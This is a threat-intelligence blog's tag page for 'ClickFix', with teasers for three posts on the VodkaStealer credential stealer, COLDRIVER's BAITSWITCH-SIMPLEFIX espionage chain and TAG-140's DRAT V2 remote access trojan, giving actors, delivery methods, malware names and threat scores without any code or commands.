Follow on X RSS Feed

ClickFix

A collection of 3 posts
VodkaStealer Malware Harvests Browser Credentials and Session Token
Malware

VodkaStealer Malware Harvests Browser Credentials and Session Token

Threat Group – Unidentified financially motivated threat actor associated with the ClickFix WordPress compromise campaign Threat Type – Information Stealer Exploited Vulnerabilities – ClickFix social engineering using compromised WordPress sites and fake Cloudflare verification prompts Malware Used – VodkaStealer, DoubleDonut loader, ChromElevator Threat Score – 🔴 7.6 High – Advanced credential harvesting malware delivered through large
5 min read
COLDRIVER targets policy and critical infrastructure using BAITSWITCH-SIMPLEFIX chain
COLDRIVER

COLDRIVER targets policy and critical infrastructure using BAITSWITCH-SIMPLEFIX chain

Threat Group – COLDRIVER Threat Type – Espionage malware and social engineering Exploited Vulnerabilities – User execution via ClickFix lure, abuse of rundll32, script execution and registry-based persistence (no CVEs assigned) Malware Used – BAITSWITCH downloader, SIMPLEFIX PowerShell backdoor, LOSTKEYS VBS payload, SPICA backdoor Threat Score – 8.2 🔴 High Last Threat Observation – 25 September
7 min read
DRAT V2 TAG-140 Bypasses Perimeter Defenses Using Social Engineering and mshta Execution
Malware

DRAT V2 TAG-140 Bypasses Perimeter Defenses Using Social Engineering and mshta Execution

Threat Group: TAG-140 / SideCopy / Transparent Tribe (APT36) Threat Type: Remote Access Trojan (RAT) Exploited Vulnerabilities: None directly; leverages social engineering and user execution vectors Malware Used: DRAT V2 (Delphi-compiled) with BroaderAspect.NET Loader Threat Score: 🟠 Elevated (6.5/10) – Due to its attribution to a state-aligned APT group, arbitrary shell
2 min read